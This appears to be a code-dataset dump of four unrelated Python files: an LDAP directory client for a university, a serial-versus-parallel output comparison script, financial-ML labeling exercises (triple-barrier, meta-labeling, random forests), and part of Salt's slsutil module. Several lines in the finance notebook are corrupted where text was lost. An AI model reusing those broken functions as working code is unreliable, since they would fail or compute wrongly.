If neither dn\n nor eid is given, then return '' (anonymous).\n \"\"\"\n if dn:\n return dn\n if eid:\n if service:\n return \"uid=%s,ou=services,dc=entdir,dc=utexas,dc=edu\" % eid\n else:\n return \"uid=%s,ou=people,dc=entdir,dc=utexas,dc=edu\" % eid\n # Anonymous.\n return ''\n\n def _get_by_attr(self, attr, value, **kwargs):\n filter_str = filter_format(\"(%s=%s)\", [attr, value])\n return self.get(filter_str, **kwargs)\n\n def get_by_eid(self, eid, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonEid\", eid, *args, **kwargs)\n\n def get_by_uin(self, uin, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonUin\", uin, *args, **kwargs)\n\n def get_by_iso(self, iso, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonIsoNumber\", iso,\n *args, **kwargs)\n\n def search(self, filter, **kwargs):\n if 'attrs' not in kwargs or kwargs['attrs'] == None:\n kwargs['attrs'] = self.attributes\n else:\n kwargs['attrs'].extend([\n attr for attr in self.attributes if attr not in kwargs['attrs']\n ])\n return super(TEDConnection, self).search(filter, **kwargs)\n\n def _search_by_attr(self, attr, value, **kwargs):\n filter_str = filter_format(\"(%s=%s)\", [attr, value])\n return self.search(filter_str, **kwargs)\n\n def search_by_eid(self, eid, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonEid\", eid, *args, **kwargs)\n\n def search_by_uin(self, uin, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonUin\", uin, *args, **kwargs)\n\n def search_by_iso(self, iso, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonIsoNumber\", iso,\n *args, **kwargs)\n\n def search_by_name(self, fullname, *args, **kwargs):\n \"\"\"\n Search for fullname in TED cn field.\n\n ``fullname`` is handled like so:\n\n * If only a single name is given, e.g. \"last\", the query finds objects\n with an exact match of the cn or objects with a matching last name\n (cn \" last\").\n * If two names are given, e.g. \"first last\", the query finds objects\n with a matching first name (cn beginning with \"first \") and last\n name.\n * If three or more names are given, e.g. 
\"first middle1 middle2 last\",\n the query finds objects with a matching first and last name that also\n contain the middle names (cn containing \" middle1 middle2 \").\n\n Note, querying for common names will likely result in the server\n returning a size limit exceeded error; thus, when at all possible, you\n should really only be querying by EID, UIN, or ISO.\n \"\"\"\n names = fullname.split()\n if len(names) < 1:\n filter_str = '(cn=)'\n elif len(names) == 1:\n filter_str = filter_format(\"(|(cn=%s)(cn=* %s))\", [names[0]] * 2)\n elif len(names) == 2:\n filter_str = filter_format(\"(&(cn=%s *)(cn=* %s))\", names)\n else:\n middle_names = \" \".join(names[1:-1])\n filter_str = filter_format(\"(&(cn=%s *)(cn=* %s *)(cn=* %s))\",\n [names[0], middle_names, names[-1]])\n return self.search(filter_str, *args, **kwargs)\n\n\nclass InteractiveTEDConnection(TEDConnection):\n \"\"\"Prompts for EID and password.\"\"\"\n\n def __init__(self, **kwargs):\n if 'eid' not in kwargs:\n kwargs['eid'] = raw_input('Enter EID: ')\n if 'password' not in kwargs:\n kwargs['password'] = getpass(\"%s's password: \" % kwargs['eid'])\n super(InteractiveTEDConnection, self).__init__(**kwargs)\n","sub_path":"ted/ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":9905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"184861213","text":"import os\nimport random\n\nimport pathlib\nimport time\nimport datetime\nimport timeit\n\n\nfopInput='/home/hung/git/COMS527_data/PrutorCodes/'\nfopTempAnalysis='/home/hung/git/COMS527_data/TempAnalysis/'\n# fopSerialTime='/home/hung/git/COMS527_data/TimeAnalysis_all/'\nfopOutputAnalysis='/home/hung/git/COMS527_data/OutputAnalysis_all3/'\n# fopParallelTime='/home/hung/git/COMS527_data/Aug1-TimeAnalysis_all/'\nfopParallelOutputAnalysis='/home/hung/git/COMS527_data/Aug1-OutputAnalysis_all3/'\n\ndef intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\ndef extractPrintOutputAndTime(strContent):\n arrContent=strContent.split('\\n')\n strPrint=''\n strTime=''\n if(len(arrContent)>=2):\n strTime=arrContent[len(arrContent)-1]\n l = list(arrContent)\n l.pop()\n strPrint='\\n'.join(l)\n return strPrint,strTime\n\nlistSerialTime=[]\nlistSerialAnalysis=[]\nlistParallelTime=[]\nlistParallelAnalysis=[]\ndictSerialTime={}\n# dictSerialAnalysis={}\ndictParallelTime={}\n# dictParallelAnalysis={}\ndictOutputSame={}\n\ncurrentPattern = \"*.txt\"\nlistFiles=[]\nlistNameIntersection=[]\ncurrentDirectory = pathlib.Path(fopParallelOutputAnalysis)\nfor currentFile in currentDirectory.glob(currentPattern):\n strFilePath=str(currentFile)\n listFiles.append(strFilePath)\n# print('Parallel size {}'.format(len(listFiles)))\nfor i in range(0,len(listFiles)):\n strFilePath=listFiles[i]\n\n isTimeSerialOK=False\n isOutputSerialOK = False\n isTimeParallelOK = False\n isOutputParallelOK = False\n\n fileName=os.path.basename(strFilePath).replace('.txt','').replace('output-','')\n strContentParallel=''\n strContentTimeParallel=''\n strContentOutputParallel=''\n\n try:\n f = open(strFilePath, 'r', encoding=\"latin-1\")\n strContentParallel = f.read().strip()\n strContentOutputParallel,strContentTimeParallel=extractPrintOutputAndTime(strContentParallel)\n f.close()\n except Exception as e:\n strContentParallel = ''\n if (strContentTimeParallel.startswith('Time elapsed in ms: ')):\n # listParallelTime.append(fileName)\n isTimeParallelOK=True\n strTime=strContentTimeParallel.replace('Time elapsed in ms: 
','').strip()\n num = float(strTime)\n dictParallelTime[fileName] = num\n if ((strContentOutputParallel != '') and (not 'error' in strContentOutputParallel)):\n isOutputParallelOK=True\n\n\n fpOutputSerial = fopOutputAnalysis + 'output-' + fileName + '.txt'\n strContentSerial = ''\n strContentTimeSerial=''\n strContentOutputSerial=''\n try:\n f = open(fpOutputSerial, 'r', encoding=\"latin-1\")\n strContentSerial = f.read().strip()\n f.close()\n\n except Exception as e:\n strContentSerial=''\n strContentOutputSerial,strContentTimeSerial=extractPrintOutputAndTime(strContentSerial)\n if (strContentTimeSerial.startswith('Time elapsed in ms: ')):\n # listSerialTime.append(fileName)\n isTimeSerialOK = True\n strTime = strContentTimeSerial.replace('Time elapsed in ms: ', '').strip()\n num = float(strTime)\n dictSerialTime[fileName] = num\n\n if ((strContentOutputSerial != '') and (not 'error' in strContentOutputSerial)):\n isOutputSerialOK=True\n listSerialAnalysis.append(fileName)\n # dictSerialAnalysis[fileName]=strContentOutputSerial\n\n # print('{} {} {} {}'.format(isTimeParallelOK,isOutputParallelOK,isTimeSerialOK,isOutputSerialOK))\n if(isTimeParallelOK and isOutputParallelOK and isTimeSerialOK and isOutputSerialOK):\n listNameIntersection.append(fileName)\n\n if strContentOutputSerial == strContentOutputParallel:\n dictOutputSame[fileName]=True\n else:\n dictOutputSame[fileName]=False\n\n print('{} file {} is OK'.format((i+1),fileName))\n else:\n print('{} file {} is missing'.format((i + 1), fileName))\n # if i == 1000:\n # break\n\nstrHead='Code,TimeSerial,TimeParallel,IsParallelBetterInTime,IsOutputConsistent,IsAllConsistent'\nlstTotal=[]\nlstTotal.append(strHead)\nnumOfAbnormalInTime=0\nnumOfAbnormalInOutput=0\nnumOfAbnormalInTotal=0\ntotalMillisecondSerial=0\ntotalMillisecondParallel=0\nfor i in range(0,len(listNameIntersection)):\n strName=listNameIntersection[i]\n isParallelBetterInTime=dictParallelTime[strName]= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef tick_bar_df(df, column, m):\n idx = tick_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\ndef volume_bars(df, column, m):\n '''\n compute volume bars\n\n # args\n df: pd.DataFrame()\n column: name for price data\n m: int(), threshold value for volume\n # returns\n idx: list of indices\n '''\n t = df[column]\n ts = 0\n idx = []\n for i, x in enumerate(tqdm(t)):\n ts += x\n if ts >= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef volume_bar_df(df, column, m):\n idx = volume_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\ndef dollar_bars(df, column, m):\n '''\n compute dollar bars\n\n # args\n df: pd.DataFrame()\n column: name for price data\n m: int(), threshold value for dollars\n # returns\n idx: list of indices\n '''\n t = df[column]\n ts = 0\n idx = []\n for i, x in enumerate(tqdm(t)):\n ts += x\n if ts >= m:\n idx.append(i)\n ts = 0\n continue\n return idx\n\ndef dollar_bar_df(df, column, m):\n idx = dollar_bars(df, column, m)\n return df.iloc[idx]\n#========================================================\n\n@jit(nopython=True)\ndef numba_isclose(a,b,rel_tol=1e-09,abs_tol=0.0):\n return np.fabs(a-b) <= np.fmax(rel_tol*np.fmax(np.fabs(a), np.fabs(b)), abs_tol)\n\n@jit(nopython=True)\ndef bt(p0, p1, bs):\n #if math.isclose((p1 - p0), 0.0, abs_tol=0.001):\n if numba_isclose((p1-p0),0.0,abs_tol=0.001):\n b = bs[-1]\n return b\n else:\n b = np.abs(p1-p0)/(p1-p0)\n return b\n\n@jit(nopython=True)\ndef 
get_imbalance(t):\n bs = np.zeros_like(t)\n for i in np.arange(1, bs.shape[0]):\n t_bt = bt(t[i-1], t[i], bs[:i-1])\n bs[i-1] = t_bt\n return bs[:-1] # remove last value\n\n\n# ## Code Snippets\n# \n# Below I reproduce all the relevant code snippets found in the book that are necessary to work through the excercises found at the end of chapter 3.\n\n# ### Symmetric CUSUM Filter [2.5.2.1]\n\n# In[175]:\n\n\ndef getTEvents(gRaw, h):\n tEvents, sPos, sNeg = [], 0, 0\n diff = np.log(gRaw).diff().dropna().abs()\n for i in tqdm(diff.index[1:]):\n try:\n pos, neg = (sPos+diff.loc[i]).astype(float), (sNeg+diff.loc[i]).astype(float)\n except Exception as e:\n print(e)\n print(sPos+diff.loc[i], type(sPos+diff.loc[i]))\n print(sNeg+diff.loc[i], type(sNeg+diff.loc[i]))\n break\n sPos, sNeg=max(0., pos.all()), min(0., neg.all())\n if sNeg<-h:\n sNeg=0;tEvents.append(i)\n elif sPos>h:\n sPos=0;tEvents.append(i)\n return pd.DatetimeIndex(tEvents)\n\n\n# ### Daily Volatility Estimator [3.1]\n\n# In[176]:\n\n\ndef getDailyVol(close,span0=100):\n # daily vol reindexed to close\n print('close; ')\n print(close)\n print('close.index-pd.Timedelta; ')\n print(close.index-pd.Timedelta(days=1))\n df0=close.index.searchsorted(close.index-pd.Timedelta(days=1))\n #print('\\n df0 1\\n', df0)\n df0=df0[df0>0] \n #print('\\n df0 2\\n', df0)\n df0=(pd.Series(close.index[df0-1],index=close.index[close.shape[0]-df0.shape[0]:])) \n #print('\\n df0 3\\n', df0)\n \n try:\n print('\\n df0 index\\n', df0.index)\n print('\\n df0 values\\n', df0.values)\n dfidxs=close.loc[df0.index].drop_duplicates()\n dfvals=close.loc[df0.values]#.iloc[:dfidxs.size] #.drop_duplicates()\n print('\\n close.loc[df0.index]\\n', dfidxs)\n print('\\n close.loc[df0.values]\\n', dfvals)\n #df1=(dfidxs.values/dfvals.values) -1 # daily rets\n df0=(dfidxs/dfvals.values) -1 # daily rets\n print('\\n df1\\n',df1)\n except Exception as e:\n print(e)\n print('adjusting shape of close.loc[df0.index]')\n cut = close.loc[df0.index].shape[0] - close.loc[df0.values].shape[0]\n df0=close.loc[df0.index].iloc[:-cut]/close.loc[df0.values].values-1\n \n #df4=pd.Series(df1).ewm(span=span0).std().dropna()\n #df0=pd.Series(df1).ewm(span=span0).std().dropna()\n df0=(df0).ewm(span=span0).std().dropna()\n\n #print('\\n df4\\n', df4)\n #df2=(pd.Series(df4.values,index=close.index[close.shape[0]-df4.shape[0]:]))\n #print('\\n df2\\n', df2)\n #return df2\n return df0\n\n\n# ### Triple-Barrier Labeling Method [3.2]\n\n# In[177]:\n\n\ndef applyPtSlOnT1(close,events,ptSl,molecule):\n # apply stop loss/profit taking, if it takes place before t1 (end of event)\n events_=events.loc[molecule]\n print('in applyPtSlOnT1',close,'events',events,'ptSl',ptSl,'molecule',molecule)\n out=events_[['t1']].copy(deep=True)\n print('out',out)\n if ptSl[0]>0: pt=ptSl[0]*events_['trgt']\n else: pt=pd.Series(index=events.index) # NaNs\n if ptSl[1]>0: sl=-ptSl[1]*events_['trgt']\n else: sl=pd.Series(index=events.index) # NaNs\n i=0\n for loc,t1 in events_['t1'].fillna(close.index[-1]).iteritems():\n try:\n df0=close[loc:t1] # path prices\n #print('\\niter ', i, 'df0 \\n',df0)\n df0=(df0/close[loc]-1)*events_.at[loc,'side'] # path returns\n out.loc[loc,'sl']=df0[df0pt[loc]].index.min() # earliest profit taking\n #print('out \\n',out)\n i=i+1\n except Exception as e:\n pass#print(e)\n return out\n\n\n# ### Gettting Time of First Touch (getEvents) [3.3], [3.6]\n\n# In[171]:\n\n\ndef getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):\n trgt=trgt.dropna()\n #1) get target\n 
trgt=trgt.loc[tEvents]\n trgt=trgt[trgt>minRet] # minRet\n #2) get t1 (max holding period)\n if t1 is False:t1=pd.Series(pd.NaT, index=tEvents.drop_duplicates())\n #3) form events object, apply stop loss on t1\n if side is None:side_,ptSl_=pd.Series(1.,index=trgt.index), [ptSl[0],ptSl[0]]\n else: side_,ptSl_=side.loc[trgt.index],ptSl[:2]\n #trgt=trgt.iloc[trgt.size-t1.size:]\n #side_=side_.iloc[side_.size-t1.size:]\n print('\\nin getEvents','trgt\\n', trgt,'t1\\n', t1,'side\\n', side_)\n events=(pd.concat({'trgt':trgt,'side':side_}, axis=1,ignore_index=True).dropna().drop_duplicates())\n #events=pd.concat({'t1':t1,'side':events.columns[0],'trgt':events.columns[1]},ignore_index=True)\n events=events.merge(pd.DataFrame(t1),right_index=True,left_index=True).dropna().drop_duplicates()\n \n events=events.rename(columns={ events.columns[0]: \"side\",events.columns[1]: \"trgt\",events.columns[2]: \"t1\" })\n print('\\nin getEvents','close\\n', close,'events\\n', events,'ptsl\\n', ptSl_,'molecule\\n' ,events.index)\n \n #df0=mpPandasObj(func=applyPtSlOnT1,pdObj=('molecule',events.index),numThreads=numThreads,close=close,events=events,ptSl=ptSl_)\n df0=applyPtSlOnT1(close, events, ptSl_, events.index)\n print('df0 after applyPtSl',df0)\n events['t1']=df0.dropna()#how='all').min(axis=1) # pd.min ignores nan\n if side is None:events=events.drop('side',axis=1)\n return events\n\n\n# ### Adding Vertical Barrier [3.4]\n\n# In[135]:\n\n\ndef addVerticalBarrier(tEvents, close, numDays=1):\n t1=close.index.searchsorted(tEvents+pd.Timedelta(days=numDays))\n t1=t1[t1minPct or df0.shape[0]<3:break\n print('dropped label: ', df0.argmin(),df0.min())\n events=events[events['bin']!=df0.argmin()]\n return events\n\n\n# ### Linear Partitions [20.4.1]\n\n# In[139]:\n\n\ndef linParts(numAtoms,numThreads):\n # partition of atoms with a single loop\n parts=np.linspace(0,numAtoms,min(numThreads,numAtoms)+1)\n parts=np.ceil(parts).astype(int)\n return parts\n\n\n# In[140]:\n\n\ndef nestedParts(numAtoms,numThreads,upperTriang=False):\n # partition of atoms with an inner loop\n parts,numThreads_=[0],min(numThreads,numAtoms)\n for num in range(numThreads_):\n part=1+4*(parts[-1]**2+parts[-1]+numAtoms*(numAtoms+1.)/numThreads_)\n part=(-1+part**.5)/2.\n parts.append(part)\n parts=np.round(parts).astype(int)\n if upperTriang: # the first rows are heaviest\n parts=np.cumsum(np.diff(parts)[::-1])\n parts=np.append(np.array([0]),parts)\n return parts\n\n\n# ### multiprocessing snippet [20.7]\n\n# In[141]:\n\n\ndef mpPandasObj(func,pdObj,numThreads=24,mpBatches=1,linMols=True,**kargs):\n '''\n Parallelize jobs, return a dataframe or series\n + func: function to be parallelized. 
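# --- Editor's note: hedged aside. ---
# linParts() above splits `numAtoms` indices into near-equal contiguous ranges,
# one per thread. A quick worked example of the boundaries it yields:
import numpy as np

parts = np.ceil(np.linspace(0, 10, min(3, 10) + 1)).astype(int)
# parts -> array([ 0,  4,  7, 10]); the molecules are the index slices
# [0:4], [4:7] and [7:10].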
Returns a DataFrame\n + pdObj[0]: Name of argument used to pass the molecule\n + pdObj[1]: List of atoms that will be grouped into molecules\n + kwds: any other argument needed by func\n \n Example: df1=mpPandasObj(func,('molecule',df0.index),24,**kwds)\n '''\n import pandas as pd\n #if linMols:parts=linParts(len(argList[1]),numThreads*mpBatches)\n #else:parts=nestedParts(len(argList[1]),numThreads*mpBatches)\n if linMols:parts=linParts(len(pdObj[1]),numThreads*mpBatches)\n else:parts=nestedParts(len(pdObj[1]),numThreads*mpBatches)\n \n jobs=[]\n for i in range(1,len(parts)):\n job={pdObj[0]:pdObj[1][parts[i-1]:parts[i]],'func':func}\n job.update(kargs)\n jobs.append(job)\n if numThreads==1:out=processJobs_(jobs)\n else: out=processJobs(jobs,numThreads=numThreads)\n if isinstance(out[0],pd.DataFrame):df0=pd.DataFrame()\n elif isinstance(out[0],pd.Series):df0=pd.Series()\n else:return out\n for i in out:df0=df0.append(i)\n df0=df0.sort_index()\n return df0\n\n\n# ### single-thread execution for debugging [20.8]\n\n# In[142]:\n\n\ndef processJobs_(jobs):\n # Run jobs sequentially, for debugging\n out=[]\n for job in jobs:\n out_=expandCall(job)\n out.append(out_)\n return out\n\n\n# ### Example of async call to multiprocessing lib [20.9]\n\n# In[143]:\n\n\nimport multiprocessing as mp\nimport datetime as dt\n\n#________________________________\ndef reportProgress(jobNum,numJobs,time0,task):\n # Report progress as asynch jobs are completed\n msg=[float(jobNum)/numJobs, (time.time()-time0)/60.]\n msg.append(msg[1]*(1/msg[0]-1))\n timeStamp=str(dt.datetime.fromtimestamp(time.time()))\n msg=timeStamp+' '+str(round(msg[0]*100,2))+'% '+task+' done after '+ str(round(msg[1],2))+' minutes. Remaining '+str(round(msg[2],2))+' minutes.'\n if jobNum df.slow\n return df.fast[(crit1) & (crit2)]\n\ndef get_down_cross(df):\n crit1 = df.fast.shift(1) > df.slow\n crit2 = df.fast < df.slow\n return df.fast[(crit1) & (crit2)]\n\nup = get_up_cross(close_df)\ndown = get_down_cross(close_df)\n\nf, ax = plt.subplots(figsize=(11,8))\n\nclose_df.loc['2014':].plot(ax=ax, alpha=.5)\nup.loc['2014':].plot(ax=ax,ls='',marker='^', markersize=7,\n alpha=0.75, label='upcross', color='g')\ndown.loc['2014':].plot(ax=ax,ls='',marker='v', markersize=7, \n alpha=0.75, label='downcross', color='r')\n\nax.legend()\n\n\n# ### (a) Derive meta-labels for `ptSl = [1,2]` and `t1` where `numdays=1`. Use as `trgt` dailyVol computed by snippet 3.1 (get events with sides)\n\n# In[261]:\n\n\nside_up = pd.Series(1, index=up.index)\nside_down = pd.Series(-1, index=down.index)\nside = pd.concat([side_up,side_down]).sort_index()\ncprint(side)\n\n\n# In[267]:\n\n\nminRet = .01 \nptsl=[1,2]\nma_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1,side=side)\ncprint(ma_events)\n\n\n# In[224]:\n\n\nma_events.side.value_counts()\n\n\n# In[268]:\n\n\nma_side = ma_events.dropna().side\n\n\n# In[269]:\n\n\nma_bins = getBins(ma_events,close).dropna()\ncprint(ma_bins)\n\n\n# In[265]:\n\n\nXx = pd.merge_asof(ma_bins, side.to_frame().rename(columns={0:'side'}),\n left_index=True, right_index=True, direction='forward')\ncprint(Xx)\n\n\n# ### (b) Train Random Forest to decide whether to trade or not `{0,1}` since underlying model (crossing m.a.) 
has decided the side, `{-1,1}`\n\n# In[227]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, classification_report\n\n\n# In[270]:\n\n\nX = ma_side.values.reshape(-1,1)\n#X = Xx.side.values.reshape(-1,1)\ny = ma_bins.bin.values\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# ## [3.5] Develop mean-reverting Bollinger Band Strategy. For each obs. model suggests a side but not size of the bet.\n\n# In[230]:\n\n\ndef bbands(price, window=None, width=None, numsd=None):\n \"\"\" returns average, upper band, and lower band\"\"\"\n ave = price.rolling(window).mean()\n sd = price.rolling(window).std(ddof=0)\n if width:\n upband = ave * (1+width)\n dnband = ave * (1-width)\n return price, np.round(ave,3), np.round(upband,3), np.round(dnband,3) \n if numsd:\n upband = ave + (sd*numsd)\n dnband = ave - (sd*numsd)\n return price, np.round(ave,3), np.round(upband,3), np.round(dnband,3)\n\n\n# In[231]:\n\n\nwindow=50\nbb_df = pd.DataFrame()\nbb_df['price'],bb_df['ave'],bb_df['upper'],bb_df['lower']=bbands(close, window=window, numsd=1)\nbb_df.dropna(inplace=True)\ncprint(bb_df)\n\n\n# In[232]:\n\n\nf,ax=plt.subplots(figsize=(11,8))\nbb_df.loc['2014'].plot(ax=ax)\n\n\n# In[233]:\n\n\ndef get_up_cross(df, col):\n # col is price column\n crit1 = df[col].shift(1) < df.upper \n crit2 = df[col] > df.upper\n return df[col][(crit1) & (crit2)]\n\ndef get_down_cross(df, col):\n # col is price column \n crit1 = df[col].shift(1) > df.lower \n crit2 = df[col] < df.lower\n return df[col][(crit1) & (crit2)]\n\nbb_down = get_down_cross(bb_df, 'price')\nbb_up = get_up_cross(bb_df, 'price') \n\nf, ax = plt.subplots(figsize=(11,8))\n\nbb_df.loc['2014':].plot(ax=ax, alpha=.5)\nbb_up.loc['2014':].plot(ax=ax, ls='', marker='^', markersize=7,\n alpha=0.75, label='upcross', color='g')\nbb_down.loc['2014':].plot(ax=ax, ls='', marker='v', markersize=7, \n alpha=0.75, label='downcross', color='r')\nax.legend()\n\n\n# ### (a) Derive meta-labels for `ptSl=[0,2]` and `t1` where `numdays=1`. Use as `trgt` dailyVol.\n\n# In[300]:\n\n\nbb_side_up = pd.Series(-1, index=bb_up.index) # sell on up cross for mean reversion\nbb_side_down = pd.Series(1, index=bb_down.index) # buy on down cross for mean reversion\nbb_side_raw = pd.concat([bb_side_up,bb_side_down]).sort_index()\ncprint(bb_side_raw)\n\nminRet = .01 \nptsl=[0,2]\nbb_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1,side=bb_side_raw)\ncprint(bb_events)\n\nbb_side = bb_events.dropna().side\ncprint(bb_side)\n\n\n# In[290]:\n\n\nbb_side.value_counts()\n\n\n# In[301]:\n\n\nbb_bins = getBins(bb_events,close).dropna()\ncprint(bb_bins)\n\n\n# In[292]:\n\n\nbb_bins.bin.value_counts()\n\n\n# ### (b) train random forest to decide to trade or not. 
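# --- Editor's note: hedged aside. ---
# The exercise below fits a RandomForest on engineered features to predict the
# meta-label {0,1}. A self-contained miniature of the same pattern on synthetic
# data (every input here is hypothetical):
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 3))                    # stand-ins: vol, srl_corr, side
y = (X[:, 0] + 0.5 * X[:, 2] > 0).astype(int)    # toy meta-label
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.5, shuffle=False)
clf = RandomForestClassifier(max_depth=2, n_estimators=100,
                             criterion='entropy', random_state=0)
clf.fit(X_tr, y_tr)
print('holdout accuracy:', clf.score(X_te, y_te))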
Use features: volatility, serial correlation, and the crossing moving averages from exercise 2.\n\n# In[293]:\n\n\ndef returns(s):\n arr = np.diff(np.log(s))\n return (pd.Series(arr, index=s.index[1:]))\n\ndef df_rolling_autocorr(df, window, lag=1):\n \"\"\"Compute rolling column-wise autocorrelation for a DataFrame.\"\"\"\n\n return (df.rolling(window=window)\n .corr(df.shift(lag))) # could .dropna() here\n\n#df_rolling_autocorr(d1, window=21).dropna().head()\n\n\n# In[294]:\n\n\nsrl_corr = df_rolling_autocorr(returns(close), window=window).rename('srl_corr')\ncprint(srl_corr)\n\n\n# In[302]:\n\n\nfeatures = (pd.DataFrame()\n .assign(vol=bb_events.trgt)\n .assign(ma_side=ma_side)\n .assign(srl_corr=srl_corr)\n .drop_duplicates()\n .dropna())\ncprint(features)\n\n\n# In[303]:\n\n\nXy = (pd.merge_asof(features, bb_bins[['bin']], \n left_index=True, right_index=True, \n direction='forward').dropna())\ncprint(Xy)\n\n\n# In[297]:\n\n\nXy.bin.value_counts()\n\n\n# In[305]:\n\n\nX = Xy.drop('bin',axis=1).values\ny = Xy['bin'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=False)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred, target_names=['no_trade','trade']))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# ### (c) What is accuracy of predictions from primary model if the secondary model does not filter bets? 
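# --- Editor's note: hedged aside. ---
# For part (c) below: with no secondary filter every primary signal is taken,
# so the benchmark is y_pred = all ones scored against the meta-labels. Sketch
# with hypothetical labels:
import numpy as np
from sklearn.metrics import classification_report

y_true = np.array([1, 0, 1, 1, 0, 1])   # hypothetical {0,1} bins
y_pred = np.ones_like(y_true)           # primary model: always trade
print(classification_report(y_true, y_pred, zero_division=0))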
What is classification report?\n\n# In[299]:\n\n\nminRet = .01 \nptsl=[0,2]\nbb_events = getEvents(close,tEvents,ptsl,target,minRet,cpus,t1=t1)\ncprint(bb_events)\n\nbb_bins = getBins(bb_events,close).dropna()\ncprint(bb_bins)\n\nfeatures = (pd.DataFrame()\n .assign(vol=bb_events.trgt)\n .assign(ma_side=ma_side)\n .assign(srl_corr=srl_corr)\n .drop_duplicates()\n .dropna())\ncprint(features)\n\nXy = (pd.merge_asof(features, bb_bins[['bin']], \n left_index=True, right_index=True, \n direction='forward').dropna())\ncprint(Xy)\n\n### run model ###\nX = Xy.drop('bin',axis=1).values\ny = Xy['bin'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=False)\n\nn_estimator = 10000\nrf = RandomForestClassifier(max_depth=2, n_estimators=n_estimator,\n criterion='entropy', random_state=RANDOM_STATE)\nrf.fit(X_train, y_train)\n\n# The random forest model by itself\ny_pred_rf = rf.predict_proba(X_test)[:, 1]\ny_pred = rf.predict(X_test)\nfpr_rf, tpr_rf, _ = roc_curve(y_test, y_pred_rf)\nprint(classification_report(y_test, y_pred))\n\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_rf, tpr_rf, label='RF')\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n\n\n# In[ ]:\n","sub_path":"Labeling and MetaLabeling for Supervised Classification.py","file_name":"Labeling and MetaLabeling for Supervised Classification.py","file_ext":"py","file_size_in_byte":27676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"565408831","text":"# -*- coding: utf-8 -*-\n'''\nUtility functions for use with or in SLS files\n'''\n\n# Import Python libs\nfrom __future__ import absolute_import, unicode_literals, print_function\n\n# Import Salt libs\nimport salt.exceptions\nimport salt.loader\nimport salt.template\nimport salt.utils.args\nimport salt.utils.dictupdate\n\n\ndef update(dest, upd, recursive_update=True, merge_lists=False):\n '''\n Merge ``upd`` recursively into ``dest``\n\n If ``merge_lists=True``, will aggregate list object types instead of\n replacing. This behavior is only activated when ``recursive_update=True``.\n\n CLI Example:\n\n .. code-block:: shell\n\n salt '*' slsutil.update '{foo: Foo}' '{bar: Bar}'\n\n '''\n return salt.utils.dictupdate.update(dest, upd, recursive_update,\n merge_lists)\n\n\ndef merge(obj_a, obj_b, strategy='smart', renderer='yaml', merge_lists=False):\n '''\n Merge a data structure into another by choosing a merge strategy\n\n Strategies:\n\n * aggregate\n * list\n * overwrite\n * recurse\n * smart\n\n CLI Example:\n\n .. code-block:: shell\n\n salt '*' slsutil.merge '{foo: Foo}' '{bar: Bar}'\n '''\n return salt.utils.dictupdate.merge(obj_a, obj_b, strategy, renderer,\n merge_lists)\n\n\ndef renderer(path=None, string=None, default_renderer='jinja|yaml', **kwargs):\n '''\n Parse a string or file through Salt's renderer system\n\n .. versionchanged:: 2018.3.0\n Add support for Salt fileserver URIs.\n\n This is an open-ended function and can be used for a variety of tasks. It\n makes use of Salt's \"renderer pipes\" system to run a string or file through\n a pipe of any of the loaded renderer modules.\n\n :param path: The path to a file on Salt's fileserver (any URIs supported by\n :py:func:`cp.get_url `) or on the local file\n system.\n :param string: An inline string to be used as the file to send through the\n renderer system. 
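# --- Editor's note: hedged aside. ---
# The "renderer pipe" described below ('jinja|yaml') renders the text with
# Jinja first, then parses the result as YAML. Outside Salt, the same
# two-stage idea can be sketched with jinja2 and PyYAML (both assumed
# installed):
import jinja2
import yaml

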